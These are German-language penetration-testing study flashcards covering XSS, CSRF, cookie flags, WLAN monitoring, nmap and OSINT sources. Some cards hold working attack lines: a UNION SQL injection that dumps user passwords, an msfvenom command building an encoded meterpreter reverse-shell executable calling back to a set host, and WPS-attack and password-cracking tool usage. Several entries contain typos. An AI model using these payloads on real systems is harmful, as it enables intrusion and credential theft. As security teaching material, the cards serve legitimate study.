01-Broken Access Control Flashcards
Welche Zugriffskontrollen werden über Access Control umgesetzt?
Das Benutzer nicht ausserhalb der ihnen zugewiesenen Rechte handeln können
Was meint man mit Cryptographic Failure?
Alle Fehler die zu einer Offenlegung der sensiblen Daten(Passwort, Kreditkarte. Gesundheitsdaten etc.) führen können.
Was ist eine Reflected XSS-Schwachstelle?
Wenn der Übertragungsparameter in einem HTTP Request einer Webanwendung ungefiltert wieder in die Antwort HTML-Seite eingebunden wird.
Was ist ein Persistent XSS?
Ähnlich wie Reflected führt einen Javascript Angriff in der Webanwendung, um Zugriff Informationen vom jeweiligen Benutzer zu erhalten
Was ist ein DOM-Based XSS?
Einbinden von Javascript-Code in einer Webseite. Fehler in einem Javascript der Anwendung
Was ist ein Request Forgery?
Heimliche,böswillige Ausführen von HTTP Requests.
Keine Abmeldung bei E-Banking, dann geht der Benutzer auf eine fake Webseite und ein Script führt ein HTTP Request auf die Online Banking mit 2000CHF Überweisungen, da Session in Cookie gespeichert ist akzeptieret die Bank den Request
HTTP Cookies und Zusatz Optionen?
Werden bei jeder Anfrage an dem Webserver übertragen.
HTTP Response Header (Server) Cookie setzten- Set-Cookie:SessionID:6755
HTTP Request Header (Client) Browser seitenabruf-Cookie:SessionID:6755
Set-Cookie Optionen
Path- für welchen Pfad
Secure- Übermittlung nur bei HTTPS-Verbindung
HttpOnly- verhindert das JavaScript auf das Cookie zugreifen kann.
SameSite- verhindert das Cookie mit seitenübergreifende Anfrage sendet. Bietet Schutz gegen XSS-Request-Forgery-Angriffe
HTTP-Response Header Optionen
Location- Antwort des Webserver“3xx“ Antwort
Server- Info Webserver
Set-Cookie- Cookie der Domain geschrieben
Spidering
Sammlung Unterverzeichnis, Formulare, Versand E-Mails, Info in Cookie
Tools: Webscarab,DirBuster, BurpSuite
Wie kann man Übergabedaten manipulieren?
Form Fiels
Http-Cookies
Http-Header(Referer, Browser)
Http Referer Header
Nachprüfungen, ob ein Benutzer von bestimmte Ressource kommt.
Was ist eine SOAP Injection XML External Entity (XEE)
Greift Applikationen an die XML Parsen. Eine External Entity erlaubt den Zugriff auf lokale oder entfernte Daten über einen deklarierten System-Identifier.
WLAN-Adapter Monitoremode?
Airmon-ng start wlan0
Airmon-ng check kill
Wireshark Filter um Mobile-Geräte Probes zu erkennen?
wlan.fc.type_subtype == 0x04
Wlan-Karte in Monitoremode bringen?
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
Wlan Scanning
Airodump-ng?
airodump-ng wlan0
Nmap Befehl findet Schwachstellen finden?
nmap —script vuln
Nmpa öffentliche Skripte nach CVE?
nmap —script vulners
Wörtliste erstellen für Wlan-Hacking?
Cewl und Chrunch
Passwort hashen mit sha256?
echo -n “passwort” | sha256sum
Wlan Hacking befehl “wash”
WPS Schwächen finden
wash -i wlan0
wash -i wlan0 -C | grep SSID
OSINT Personensdetails der Angstellten finden?
Emailcrwalr.com
Eingesetzte CMS prüfen?
whatcms.org
SQL-Injection, Alle Benutzer mit Passwort ausgeben?
Select book, autor from bibel UNION select username,password from userdata —
DNS-Abfragen nur Ergebnisse?
dig +short -t any test.ch
Befehl für halboffene Ports scannen?
-sS(TCP-SYN-Scan)
Was verhindert ein httpOnly flag beim Cookie?
Verhindert das Cookie durch Scripte ausgelesen werden können.
Was ist ein secure Cookie?
Cookie werden verschlüsselt mittels Https übermittelt.
Exploits finden mit welchem Kali Tool?
searchsploit
Msfvenom encoder Befehl erstellen
msfvenom -p windows/meterpreter/reverse_https
LHOST=192.168.101.34 LPORT=443 -e x86/shikata_ga_nai -i 10 -f exe > bad.exe
Einfacher Nmap Befehl für offene Ports, Versionen und Schwachstellen
nmap -SV -A 192.168.201.1
Tastaturlayaout einstellen Befehl?
dpkg-reconfigure keyboard-configuration
Zeitzone einstellen Code
dpkg-reconfigure tzdata
Mit was kann man Hosts auskundschaften?
Whois?
Dnslytics.com
Dnsdumpster.com
Netcraft.com
Traceroute
Dns recon
Auskundschaften E-mail?
Haveibeenpwned
Azurewebsites.net
Auskundschaften Person?
Yasni.de
Moneyhouse.ch
Autonummer abfragen
Wireshark filter Monitore mode PROBES?
wlan.fc.type_subtype ==0x04
Wireshark Filter Monitor mode BEACONS?
wlan.fc.type_subtype ==0x08
Hashwert von Datei prüfen?
Sha265sum password.sh
Passwort testing bei Onlinedienst
Hydra, Medusa und Ncrack
Auskundschaften Website?
- Robots.txt
- Security Header Einstellungen prüfen
- Cookie Einstellungen
- Banner
- Internetarchiv